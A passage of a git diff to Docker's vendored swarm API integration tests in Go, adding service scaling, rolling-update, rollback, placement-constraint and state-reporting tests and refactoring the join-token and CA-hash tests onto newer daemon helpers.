setInstances(instances)) + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, instances) + + cli, err := d.NewClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + options := types.ServiceInspectOptions{InsertDefaults: true} + + // insertDefaults inserts UpdateConfig when service is fetched by ID + resp, _, err := cli.ServiceInspectWithRaw(context.Background(), id, options) + out := fmt.Sprintf("%+v", resp) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, "UpdateConfig") + + // insertDefaults inserts UpdateConfig when service is fetched by ID + resp, _, err = cli.ServiceInspectWithRaw(context.Background(), "top", options) + out = fmt.Sprintf("%+v", resp) + c.Assert(err, checker.IsNil) + c.Assert(string(out), checker.Contains, "UpdateConfig") + + service := d.GetService(c, id) + instances = 5 + d.UpdateService(c, service, setInstances(instances)) + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, instances) + + d.RemoveService(c, service.ID) + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 0) +} + +func (s *DockerSwarmSuite) TestAPISwarmServicesMultipleAgents(c *check.C) { + d1 := s.AddDaemon(c, true, true) + d2 := s.AddDaemon(c, true, false) + d3 := s.AddDaemon(c, true, false) + + time.Sleep(1 * time.Second) // make sure all daemons are ready to accept tasks + + instances := 9 + id := d1.CreateService(c, simpleTestService, setInstances(instances)) + + waitAndAssert(c, defaultReconciliationTimeout, d1.CheckActiveContainerCount, checker.GreaterThan, 0) + waitAndAssert(c, defaultReconciliationTimeout, d2.CheckActiveContainerCount, checker.GreaterThan, 0) + waitAndAssert(c, defaultReconciliationTimeout, d3.CheckActiveContainerCount, checker.GreaterThan, 0) + + waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.CheckActiveContainerCount, d2.CheckActiveContainerCount, d3.CheckActiveContainerCount), checker.Equals, instances) + + // reconciliation on d2 node down + d2.Stop(c) + + waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.CheckActiveContainerCount, d3.CheckActiveContainerCount), checker.Equals, instances) + + // test downscaling + instances = 5 + d1.UpdateService(c, d1.GetService(c, id), setInstances(instances)) + waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.CheckActiveContainerCount, d3.CheckActiveContainerCount), checker.Equals, instances) + +} + +func (s *DockerSwarmSuite) TestAPISwarmServicesCreateGlobal(c *check.C) { + d1 := s.AddDaemon(c, true, true) + d2 := s.AddDaemon(c, true, false) + d3 := s.AddDaemon(c, true, false) + + d1.CreateService(c, simpleTestService, setGlobalMode) + + waitAndAssert(c, defaultReconciliationTimeout, d1.CheckActiveContainerCount, checker.Equals, 1) + waitAndAssert(c, defaultReconciliationTimeout, d2.CheckActiveContainerCount, checker.Equals, 1) + waitAndAssert(c, defaultReconciliationTimeout, d3.CheckActiveContainerCount, checker.Equals, 1) + + d4 := s.AddDaemon(c, true, false) + d5 := s.AddDaemon(c, true, false) + + waitAndAssert(c, defaultReconciliationTimeout, d4.CheckActiveContainerCount, checker.Equals, 1) + waitAndAssert(c, defaultReconciliationTimeout, d5.CheckActiveContainerCount, checker.Equals, 1) +} + +func (s *DockerSwarmSuite) TestAPISwarmServicesUpdate(c *check.C) { + const nodeCount = 3 + var daemons [nodeCount]*daemon.Daemon + for i := 0; i < nodeCount; i++ { + daemons[i] = s.AddDaemon(c, true, i == 0) + } + // wait for nodes ready + waitAndAssert(c, 5*time.Second, daemons[0].CheckNodeReadyCount, checker.Equals, nodeCount) + + // service image at start + image1 := "busybox:latest" + // target image in update + image2 := "busybox:test" + + // create a different tag + for _, d := range daemons { + out, err := d.Cmd("tag", image1, image2) + c.Assert(err, checker.IsNil, check.Commentf(out)) + } + + // create service + instances := 5 + parallelism := 2 + rollbackParallelism := 3 + id := daemons[0].CreateService(c, serviceForUpdate, setInstances(instances)) + + // wait for tasks ready + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].CheckRunningTaskImages, checker.DeepEquals, + map[string]int{image1: instances}) + + // issue service update + service := daemons[0].GetService(c, id) + daemons[0].UpdateService(c, service, setImage(image2)) + + // first batch + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].CheckRunningTaskImages, checker.DeepEquals, + map[string]int{image1: instances - parallelism, image2: parallelism}) + + // 2nd batch + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].CheckRunningTaskImages, checker.DeepEquals, + map[string]int{image1: instances - 2*parallelism, image2: 2 * parallelism}) + + // 3nd batch + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].CheckRunningTaskImages, checker.DeepEquals, + map[string]int{image2: instances}) + + // Roll back to the previous version. This uses the CLI because + // rollback used to be a client-side operation. + out, err := daemons[0].Cmd("service", "update", "--detach", "--rollback", id) + c.Assert(err, checker.IsNil, check.Commentf(out)) + + // first batch + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].CheckRunningTaskImages, checker.DeepEquals, + map[string]int{image2: instances - rollbackParallelism, image1: rollbackParallelism}) + + // 2nd batch + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].CheckRunningTaskImages, checker.DeepEquals, + map[string]int{image1: instances}) +} + +func (s *DockerSwarmSuite) TestAPISwarmServicesUpdateStartFirst(c *check.C) { + d := s.AddDaemon(c, true, true) + + // service image at start + image1 := "busybox:latest" + // target image in update + image2 := "testhealth:latest" + + // service started from this image won't pass health check + result := cli.BuildCmd(c, image2, cli.Daemon(d), + build.WithDockerfile(`FROM busybox + HEALTHCHECK --interval=1s --timeout=30s --retries=1024 \ + CMD cat /status`), + ) + result.Assert(c, icmd.Success) + + // create service + instances := 5 + parallelism := 2 + rollbackParallelism := 3 + id := d.CreateService(c, serviceForUpdate, setInstances(instances), setUpdateOrder(swarm.UpdateOrderStartFirst), setRollbackOrder(swarm.UpdateOrderStartFirst)) + + checkStartingTasks := func(expected int) []swarm.Task { + var startingTasks []swarm.Task + waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + tasks := d.GetServiceTasks(c, id) + startingTasks = nil + for _, t := range tasks { + if t.Status.State == swarm.TaskStateStarting { + startingTasks = append(startingTasks, t) + } + } + return startingTasks, nil + }, checker.HasLen, expected) + + return startingTasks + } + + makeTasksHealthy := func(tasks []swarm.Task) { + for _, t := range tasks { + containerID := t.Status.ContainerStatus.ContainerID + d.Cmd("exec", containerID, "touch", "/status") + } + } + + // wait for tasks ready + waitAndAssert(c, defaultReconciliationTimeout, d.CheckRunningTaskImages, checker.DeepEquals, + map[string]int{image1: instances}) + + // issue service update + service := d.GetService(c, id) + d.UpdateService(c, service, setImage(image2)) + + // first batch + + // The old tasks should be running, and the new ones should be starting. + startingTasks := checkStartingTasks(parallelism) + + waitAndAssert(c, defaultReconciliationTimeout, d.CheckRunningTaskImages, checker.DeepEquals, + map[string]int{image1: instances}) + + // make it healthy + makeTasksHealthy(startingTasks) + + waitAndAssert(c, defaultReconciliationTimeout, d.CheckRunningTaskImages, checker.DeepEquals, + map[string]int{image1: instances - parallelism, image2: parallelism}) + + // 2nd batch + + // The old tasks should be running, and the new ones should be starting. + startingTasks = checkStartingTasks(parallelism) + + waitAndAssert(c, defaultReconciliationTimeout, d.CheckRunningTaskImages, checker.DeepEquals, + map[string]int{image1: instances - parallelism, image2: parallelism}) + + // make it healthy + makeTasksHealthy(startingTasks) + + waitAndAssert(c, defaultReconciliationTimeout, d.CheckRunningTaskImages, checker.DeepEquals, + map[string]int{image1: instances - 2*parallelism, image2: 2 * parallelism}) + + // 3nd batch + + // The old tasks should be running, and the new ones should be starting. + startingTasks = checkStartingTasks(1) + + waitAndAssert(c, defaultReconciliationTimeout, d.CheckRunningTaskImages, checker.DeepEquals, + map[string]int{image1: instances - 2*parallelism, image2: 2 * parallelism}) + + // make it healthy + makeTasksHealthy(startingTasks) + + waitAndAssert(c, defaultReconciliationTimeout, d.CheckRunningTaskImages, checker.DeepEquals, + map[string]int{image2: instances}) + + // Roll back to the previous version. This uses the CLI because + // rollback is a client-side operation. + out, err := d.Cmd("service", "update", "--detach", "--rollback", id) + c.Assert(err, checker.IsNil, check.Commentf(out)) + + // first batch + waitAndAssert(c, defaultReconciliationTimeout, d.CheckRunningTaskImages, checker.DeepEquals, + map[string]int{image2: instances - rollbackParallelism, image1: rollbackParallelism}) + + // 2nd batch + waitAndAssert(c, defaultReconciliationTimeout, d.CheckRunningTaskImages, checker.DeepEquals, + map[string]int{image1: instances}) +} + +func (s *DockerSwarmSuite) TestAPISwarmServicesFailedUpdate(c *check.C) { + const nodeCount = 3 + var daemons [nodeCount]*daemon.Daemon + for i := 0; i < nodeCount; i++ { + daemons[i] = s.AddDaemon(c, true, i == 0) + } + // wait for nodes ready + waitAndAssert(c, 5*time.Second, daemons[0].CheckNodeReadyCount, checker.Equals, nodeCount) + + // service image at start + image1 := "busybox:latest" + // target image in update + image2 := "busybox:badtag" + + // create service + instances := 5 + id := daemons[0].CreateService(c, serviceForUpdate, setInstances(instances)) + + // wait for tasks ready + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].CheckRunningTaskImages, checker.DeepEquals, + map[string]int{image1: instances}) + + // issue service update + service := daemons[0].GetService(c, id) + daemons[0].UpdateService(c, service, setImage(image2), setFailureAction(swarm.UpdateFailureActionPause), setMaxFailureRatio(0.25), setParallelism(1)) + + // should update 2 tasks and then pause + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].CheckServiceUpdateState(id), checker.Equals, swarm.UpdateStatePaused) + v, _ := daemons[0].CheckServiceRunningTasks(id)(c) + c.Assert(v, checker.Equals, instances-2) + + // Roll back to the previous version. This uses the CLI because + // rollback used to be a client-side operation. + out, err := daemons[0].Cmd("service", "update", "--detach", "--rollback", id) + c.Assert(err, checker.IsNil, check.Commentf(out)) + + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].CheckRunningTaskImages, checker.DeepEquals, + map[string]int{image1: instances}) +} + +func (s *DockerSwarmSuite) TestAPISwarmServiceConstraintRole(c *check.C) { + const nodeCount = 3 + var daemons [nodeCount]*daemon.Daemon + for i := 0; i < nodeCount; i++ { + daemons[i] = s.AddDaemon(c, true, i == 0) + } + // wait for nodes ready + waitAndAssert(c, 5*time.Second, daemons[0].CheckNodeReadyCount, checker.Equals, nodeCount) + + // create service + constraints := []string{"node.role==worker"} + instances := 3 + id := daemons[0].CreateService(c, simpleTestService, setConstraints(constraints), setInstances(instances)) + // wait for tasks ready + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].CheckServiceRunningTasks(id), checker.Equals, instances) + // validate tasks are running on worker nodes + tasks := daemons[0].GetServiceTasks(c, id) + for _, task := range tasks { + node := daemons[0].GetNode(c, task.NodeID) + c.Assert(node.Spec.Role, checker.Equals, swarm.NodeRoleWorker) + } + //remove service + daemons[0].RemoveService(c, id) + + // create service + constraints = []string{"node.role!=worker"} + id = daemons[0].CreateService(c, simpleTestService, setConstraints(constraints), setInstances(instances)) + // wait for tasks ready + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].CheckServiceRunningTasks(id), checker.Equals, instances) + tasks = daemons[0].GetServiceTasks(c, id) + // validate tasks are running on manager nodes + for _, task := range tasks { + node := daemons[0].GetNode(c, task.NodeID) + c.Assert(node.Spec.Role, checker.Equals, swarm.NodeRoleManager) + } + //remove service + daemons[0].RemoveService(c, id) + + // create service + constraints = []string{"node.role==nosuchrole"} + id = daemons[0].CreateService(c, simpleTestService, setConstraints(constraints), setInstances(instances)) + // wait for tasks created + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].CheckServiceTasks(id), checker.Equals, instances) + // let scheduler try + time.Sleep(250 * time.Millisecond) + // validate tasks are not assigned to any node + tasks = daemons[0].GetServiceTasks(c, id) + for _, task := range tasks { + c.Assert(task.NodeID, checker.Equals, "") + } +} + +func (s *DockerSwarmSuite) TestAPISwarmServiceConstraintLabel(c *check.C) { + const nodeCount = 3 + var daemons [nodeCount]*daemon.Daemon + for i := 0; i < nodeCount; i++ { + daemons[i] = s.AddDaemon(c, true, i == 0) + } + // wait for nodes ready + waitAndAssert(c, 5*time.Second, daemons[0].CheckNodeReadyCount, checker.Equals, nodeCount) + nodes := daemons[0].ListNodes(c) + c.Assert(len(nodes), checker.Equals, nodeCount) + + // add labels to nodes + daemons[0].UpdateNode(c, nodes[0].ID, func(n *swarm.Node) { + n.Spec.Annotations.Labels = map[string]string{ + "security": "high", + } + }) + for i := 1; i < nodeCount; i++ { + daemons[0].UpdateNode(c, nodes[i].ID, func(n *swarm.Node) { + n.Spec.Annotations.Labels = map[string]string{ + "security": "low", + } + }) + } + + // create service + instances := 3 + constraints := []string{"node.labels.security==high"} + id := daemons[0].CreateService(c, simpleTestService, setConstraints(constraints), setInstances(instances)) + // wait for tasks ready + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].CheckServiceRunningTasks(id), checker.Equals, instances) + tasks := daemons[0].GetServiceTasks(c, id) + // validate all tasks are running on nodes[0] + for _, task := range tasks { + c.Assert(task.NodeID, checker.Equals, nodes[0].ID) + } + //remove service + daemons[0].RemoveService(c, id) + + // create service + constraints = []string{"node.labels.security!=high"} + id = daemons[0].CreateService(c, simpleTestService, setConstraints(constraints), setInstances(instances)) + // wait for tasks ready + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].CheckServiceRunningTasks(id), checker.Equals, instances) + tasks = daemons[0].GetServiceTasks(c, id) + // validate all tasks are NOT running on nodes[0] + for _, task := range tasks { + c.Assert(task.NodeID, checker.Not(checker.Equals), nodes[0].ID) + } + //remove service + daemons[0].RemoveService(c, id) + + constraints = []string{"node.labels.security==medium"} + id = daemons[0].CreateService(c, simpleTestService, setConstraints(constraints), setInstances(instances)) + // wait for tasks created + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].CheckServiceTasks(id), checker.Equals, instances) + // let scheduler try + time.Sleep(250 * time.Millisecond) + tasks = daemons[0].GetServiceTasks(c, id) + // validate tasks are not assigned + for _, task := range tasks { + c.Assert(task.NodeID, checker.Equals, "") + } + //remove service + daemons[0].RemoveService(c, id) + + // multiple constraints + constraints = []string{ + "node.labels.security==high", + fmt.Sprintf("node.id==%s", nodes[1].ID), + } + id = daemons[0].CreateService(c, simpleTestService, setConstraints(constraints), setInstances(instances)) + // wait for tasks created + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].CheckServiceTasks(id), checker.Equals, instances) + // let scheduler try + time.Sleep(250 * time.Millisecond) + tasks = daemons[0].GetServiceTasks(c, id) + // validate tasks are not assigned + for _, task := range tasks { + c.Assert(task.NodeID, checker.Equals, "") + } + // make nodes[1] fulfills the constraints + daemons[0].UpdateNode(c, nodes[1].ID, func(n *swarm.Node) { + n.Spec.Annotations.Labels = map[string]string{ + "security": "high", + } + }) + // wait for tasks ready + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].CheckServiceRunningTasks(id), checker.Equals, instances) + tasks = daemons[0].GetServiceTasks(c, id) + for _, task := range tasks { + c.Assert(task.NodeID, checker.Equals, nodes[1].ID) + } +} + +func (s *DockerSwarmSuite) TestAPISwarmServicePlacementPrefs(c *check.C) { + const nodeCount = 3 + var daemons [nodeCount]*daemon.Daemon + for i := 0; i < nodeCount; i++ { + daemons[i] = s.AddDaemon(c, true, i == 0) + } + // wait for nodes ready + waitAndAssert(c, 5*time.Second, daemons[0].CheckNodeReadyCount, checker.Equals, nodeCount) + nodes := daemons[0].ListNodes(c) + c.Assert(len(nodes), checker.Equals, nodeCount) + + // add labels to nodes + daemons[0].UpdateNode(c, nodes[0].ID, func(n *swarm.Node) { + n.Spec.Annotations.Labels = map[string]string{ + "rack": "a", + } + }) + for i := 1; i < nodeCount; i++ { + daemons[0].UpdateNode(c, nodes[i].ID, func(n *swarm.Node) { + n.Spec.Annotations.Labels = map[string]string{ + "rack": "b", + } + }) + } + + // create service + instances := 4 + prefs := []swarm.PlacementPreference{{Spread: &swarm.SpreadOver{SpreadDescriptor: "node.labels.rack"}}} + id := daemons[0].CreateService(c, simpleTestService, setPlacementPrefs(prefs), setInstances(instances)) + // wait for tasks ready + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].CheckServiceRunningTasks(id), checker.Equals, instances) + tasks := daemons[0].GetServiceTasks(c, id) + // validate all tasks are running on nodes[0] + tasksOnNode := make(map[string]int) + for _, task := range tasks { + tasksOnNode[task.NodeID]++ + } + c.Assert(tasksOnNode[nodes[0].ID], checker.Equals, 2) + c.Assert(tasksOnNode[nodes[1].ID], checker.Equals, 1) + c.Assert(tasksOnNode[nodes[2].ID], checker.Equals, 1) +} + +func (s *DockerSwarmSuite) TestAPISwarmServicesStateReporting(c *check.C) { + testRequires(c, SameHostDaemon) + testRequires(c, DaemonIsLinux) + + d1 := s.AddDaemon(c, true, true) + d2 := s.AddDaemon(c, true, true) + d3 := s.AddDaemon(c, true, false) + + time.Sleep(1 * time.Second) // make sure all daemons are ready to accept + + instances := 9 + d1.CreateService(c, simpleTestService, setInstances(instances)) + + waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.CheckActiveContainerCount, d2.CheckActiveContainerCount, d3.CheckActiveContainerCount), checker.Equals, instances) + + getContainers := func() map[string]*daemon.Daemon { + m := make(map[string]*daemon.Daemon) + for _, d := range []*daemon.Daemon{d1, d2, d3} { + for _, id := range d.ActiveContainers(c) { + m[id] = d + } + } + return m + } + + containers := getContainers() + c.Assert(containers, checker.HasLen, instances) + var toRemove string + for i := range containers { + toRemove = i + } + + _, err := containers[toRemove].Cmd("stop", toRemove) + c.Assert(err, checker.IsNil) + + waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.CheckActiveContainerCount, d2.CheckActiveContainerCount, d3.CheckActiveContainerCount), checker.Equals, instances) + + containers2 := getContainers() + c.Assert(containers2, checker.HasLen, instances) + for i := range containers { + if i == toRemove { + c.Assert(containers2[i], checker.IsNil) + } else { + c.Assert(containers2[i], checker.NotNil) + } + } + + containers = containers2 + for i := range containers { + toRemove = i + } + + // try with killing process outside of docker + pidStr, err := containers[toRemove].Cmd("inspect", "-f", "{{.State.Pid}}", toRemove) + c.Assert(err, checker.IsNil) + pid, err := strconv.Atoi(strings.TrimSpace(pidStr)) + c.Assert(err, checker.IsNil) + c.Assert(unix.Kill(pid, unix.SIGKILL), checker.IsNil) + + time.Sleep(time.Second) // give some time to handle the signal + + waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.CheckActiveContainerCount, d2.CheckActiveContainerCount, d3.CheckActiveContainerCount), checker.Equals, instances) + + containers2 = getContainers() + c.Assert(containers2, checker.HasLen, instances) + for i := range containers { + if i == toRemove { + c.Assert(containers2[i], checker.IsNil) + } else { + c.Assert(containers2[i], checker.NotNil) + } + } +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_swarm_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_swarm_test.go index 1f8eaec6de..6a31dd209f 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_api_swarm_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_swarm_test.go @@ -3,21 +3,31 @@ package main import ( - "encoding/json" + "context" "fmt" + "io/ioutil" + "net" "net/http" - "os" "path/filepath" - "strconv" "strings" "sync" - "syscall" "time" + "github.com/cloudflare/cfssl/csr" + "github.com/cloudflare/cfssl/helpers" + "github.com/cloudflare/cfssl/initca" "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/container" "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/client" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/daemon" + testdaemon "github.com/docker/docker/internal/test/daemon" + "github.com/docker/docker/internal/test/request" + "github.com/docker/swarmkit/ca" "github.com/go-check/check" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) var defaultReconciliationTimeout = 30 * time.Second @@ -25,571 +35,237 @@ var defaultReconciliationTimeout = 30 * time.Second func (s *DockerSwarmSuite) TestAPISwarmInit(c *check.C) { // todo: should find a better way to verify that components are running than /info d1 := s.AddDaemon(c, true, true) - info, err := d1.info() - c.Assert(err, checker.IsNil) + info := d1.SwarmInfo(c) c.Assert(info.ControlAvailable, checker.True) c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) + c.Assert(info.Cluster.RootRotationInProgress, checker.False) d2 := s.AddDaemon(c, true, false) - info, err = d2.info() - c.Assert(err, checker.IsNil) + info = d2.SwarmInfo(c) c.Assert(info.ControlAvailable, checker.False) c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) // Leaving cluster - c.Assert(d2.Leave(false), checker.IsNil) + c.Assert(d2.SwarmLeave(false), checker.IsNil) - info, err = d2.info() - c.Assert(err, checker.IsNil) + info = d2.SwarmInfo(c) c.Assert(info.ControlAvailable, checker.False) c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateInactive) - c.Assert(d2.Join(swarm.JoinRequest{JoinToken: d1.joinTokens(c).Worker, RemoteAddrs: []string{d1.listenAddr}}), checker.IsNil) + d2.SwarmJoin(c, swarm.JoinRequest{ + ListenAddr: d1.SwarmListenAddr(), + JoinToken: d1.JoinTokens(c).Worker, + RemoteAddrs: []string{d1.SwarmListenAddr()}, + }) - info, err = d2.info() - c.Assert(err, checker.IsNil) + info = d2.SwarmInfo(c) c.Assert(info.ControlAvailable, checker.False) c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) // Current state restoring after restarts - err = d1.Stop() - c.Assert(err, checker.IsNil) - err = d2.Stop() - c.Assert(err, checker.IsNil) + d1.Stop(c) + d2.Stop(c) - err = d1.Start() - c.Assert(err, checker.IsNil) - err = d2.Start() - c.Assert(err, checker.IsNil) + d1.Start(c) + d2.Start(c) - info, err = d1.info() - c.Assert(err, checker.IsNil) + info = d1.SwarmInfo(c) c.Assert(info.ControlAvailable, checker.True) c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) - info, err = d2.info() - c.Assert(err, checker.IsNil) + info = d2.SwarmInfo(c) c.Assert(info.ControlAvailable, checker.False) c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) } func (s *DockerSwarmSuite) TestAPISwarmJoinToken(c *check.C) { d1 := s.AddDaemon(c, false, false) - c.Assert(d1.Init(swarm.InitRequest{}), checker.IsNil) + d1.SwarmInit(c, swarm.InitRequest{}) + + // todo: error message differs depending if some components of token are valid d2 := s.AddDaemon(c, false, false) - err := d2.Join(swarm.JoinRequest{RemoteAddrs: []string{d1.listenAddr}}) + c2 := d2.NewClientT(c) + err := c2.SwarmJoin(context.Background(), swarm.JoinRequest{ + ListenAddr: d2.SwarmListenAddr(), + RemoteAddrs: []string{d1.SwarmListenAddr()}, + }) c.Assert(err, checker.NotNil) c.Assert(err.Error(), checker.Contains, "join token is necessary") - info, err := d2.info() - c.Assert(err, checker.IsNil) + info := d2.SwarmInfo(c) c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateInactive) - err = d2.Join(swarm.JoinRequest{JoinToken: "foobaz", RemoteAddrs: []string{d1.listenAddr}}) + err = c2.SwarmJoin(context.Background(), swarm.JoinRequest{ + ListenAddr: d2.SwarmListenAddr(), + JoinToken: "foobaz", + RemoteAddrs: []string{d1.SwarmListenAddr()}, + }) c.Assert(err, checker.NotNil) - c.Assert(err.Error(), checker.Contains, "join token is necessary") - info, err = d2.info() - c.Assert(err, checker.IsNil) + c.Assert(err.Error(), checker.Contains, "invalid join token") + info = d2.SwarmInfo(c) c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateInactive) - workerToken := d1.joinTokens(c).Worker + workerToken := d1.JoinTokens(c).Worker - c.Assert(d2.Join(swarm.JoinRequest{JoinToken: workerToken, RemoteAddrs: []string{d1.listenAddr}}), checker.IsNil) - info, err = d2.info() - c.Assert(err, checker.IsNil) + d2.SwarmJoin(c, swarm.JoinRequest{ + ListenAddr: d2.SwarmListenAddr(), + JoinToken: workerToken, + RemoteAddrs: []string{d1.SwarmListenAddr()}, + }) + info = d2.SwarmInfo(c) c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) - c.Assert(d2.Leave(false), checker.IsNil) - info, err = d2.info() - c.Assert(err, checker.IsNil) + c.Assert(d2.SwarmLeave(false), checker.IsNil) + info = d2.SwarmInfo(c) c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateInactive) // change tokens - d1.rotateTokens(c) + d1.RotateTokens(c) - err = d2.Join(swarm.JoinRequest{JoinToken: workerToken, RemoteAddrs: []string{d1.listenAddr}}) + err = c2.SwarmJoin(context.Background(), swarm.JoinRequest{ + ListenAddr: d2.SwarmListenAddr(), + JoinToken: workerToken, + RemoteAddrs: []string{d1.SwarmListenAddr()}, + }) c.Assert(err, checker.NotNil) c.Assert(err.Error(), checker.Contains, "join token is necessary") - info, err = d2.info() - c.Assert(err, checker.IsNil) + info = d2.SwarmInfo(c) c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateInactive) - workerToken = d1.joinTokens(c).Worker + workerToken = d1.JoinTokens(c).Worker - c.Assert(d2.Join(swarm.JoinRequest{JoinToken: workerToken, RemoteAddrs: []string{d1.listenAddr}}), checker.IsNil) - info, err = d2.info() - c.Assert(err, checker.IsNil) + d2.SwarmJoin(c, swarm.JoinRequest{JoinToken: workerToken, RemoteAddrs: []string{d1.SwarmListenAddr()}}) + info = d2.SwarmInfo(c) c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) - c.Assert(d2.Leave(false), checker.IsNil) - info, err = d2.info() - c.Assert(err, checker.IsNil) + c.Assert(d2.SwarmLeave(false), checker.IsNil) + info = d2.SwarmInfo(c) c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateInactive) // change spec, don't change tokens - d1.updateSwarm(c, func(s *swarm.Spec) {}) + d1.UpdateSwarm(c, func(s *swarm.Spec) {}) - err = d2.Join(swarm.JoinRequest{RemoteAddrs: []string{d1.listenAddr}}) + err = c2.SwarmJoin(context.Background(), swarm.JoinRequest{ + ListenAddr: d2.SwarmListenAddr(), + RemoteAddrs: []string{d1.SwarmListenAddr()}, + }) c.Assert(err, checker.NotNil) c.Assert(err.Error(), checker.Contains, "join token is necessary") - info, err = d2.info() - c.Assert(err, checker.IsNil) + info = d2.SwarmInfo(c) c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateInactive) - c.Assert(d2.Join(swarm.JoinRequest{JoinToken: workerToken, RemoteAddrs: []string{d1.listenAddr}}), checker.IsNil) - info, err = d2.info() - c.Assert(err, checker.IsNil) + d2.SwarmJoin(c, swarm.JoinRequest{JoinToken: workerToken, RemoteAddrs: []string{d1.SwarmListenAddr()}}) + info = d2.SwarmInfo(c) c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) - c.Assert(d2.Leave(false), checker.IsNil) - info, err = d2.info() - c.Assert(err, checker.IsNil) + c.Assert(d2.SwarmLeave(false), checker.IsNil) + info = d2.SwarmInfo(c) c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateInactive) } +func (s *DockerSwarmSuite) TestUpdateSwarmAddExternalCA(c *check.C) { + d1 := s.AddDaemon(c, false, false) + d1.SwarmInit(c, swarm.InitRequest{}) + d1.UpdateSwarm(c, func(s *swarm.Spec) { + s.CAConfig.ExternalCAs = []*swarm.ExternalCA{ + { + Protocol: swarm.ExternalCAProtocolCFSSL, + URL: "https://thishasnoca.org", + }, + { + Protocol: swarm.ExternalCAProtocolCFSSL, + URL: "https://thishasacacert.org", + CACert: "cacert", + }, + } + }) + info := d1.SwarmInfo(c) + c.Assert(info.Cluster.Spec.CAConfig.ExternalCAs, checker.HasLen, 2) + c.Assert(info.Cluster.Spec.CAConfig.ExternalCAs[0].CACert, checker.Equals, "") + c.Assert(info.Cluster.Spec.CAConfig.ExternalCAs[1].CACert, checker.Equals, "cacert") +} + func (s *DockerSwarmSuite) TestAPISwarmCAHash(c *check.C) { d1 := s.AddDaemon(c, true, true) d2 := s.AddDaemon(c, false, false) - splitToken := strings.Split(d1.joinTokens(c).Worker, "-") + splitToken := strings.Split(d1.JoinTokens(c).Worker, "-") splitToken[2] = "1kxftv4ofnc6mt30lmgipg6ngf9luhwqopfk1tz6bdmnkubg0e" replacementToken := strings.Join(splitToken, "-") - err := d2.Join(swarm.JoinRequest{JoinToken: replacementToken, RemoteAddrs: []string{d1.listenAddr}}) + c2 := d2.NewClientT(c) + err := c2.SwarmJoin(context.Background(), swarm.JoinRequest{ + ListenAddr: d2.SwarmListenAddr(), + JoinToken: replacementToken, + RemoteAddrs: []string{d1.SwarmListenAddr()}, + }) c.Assert(err, checker.NotNil) c.Assert(err.Error(), checker.Contains, "remote CA does not match fingerprint") } func (s *DockerSwarmSuite) TestAPISwarmPromoteDemote(c *check.C) { d1 := s.AddDaemon(c, false, false) - c.Assert(d1.Init(swarm.InitRequest{}), checker.IsNil) + d1.SwarmInit(c, swarm.InitRequest{}) d2 := s.AddDaemon(c, true, false) - info, err := d2.info() - c.Assert(err, checker.IsNil) + info := d2.SwarmInfo(c) c.Assert(info.ControlAvailable, checker.False) c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) - d1.updateNode(c, d2.NodeID, func(n *swarm.Node) { + d1.UpdateNode(c, d2.NodeID(), func(n *swarm.Node) { n.Spec.Role = swarm.NodeRoleManager }) - waitAndAssert(c, defaultReconciliationTimeout, d2.checkControlAvailable, checker.True) + waitAndAssert(c, defaultReconciliationTimeout, d2.CheckControlAvailable, checker.True) - d1.updateNode(c, d2.NodeID, func(n *swarm.Node) { + 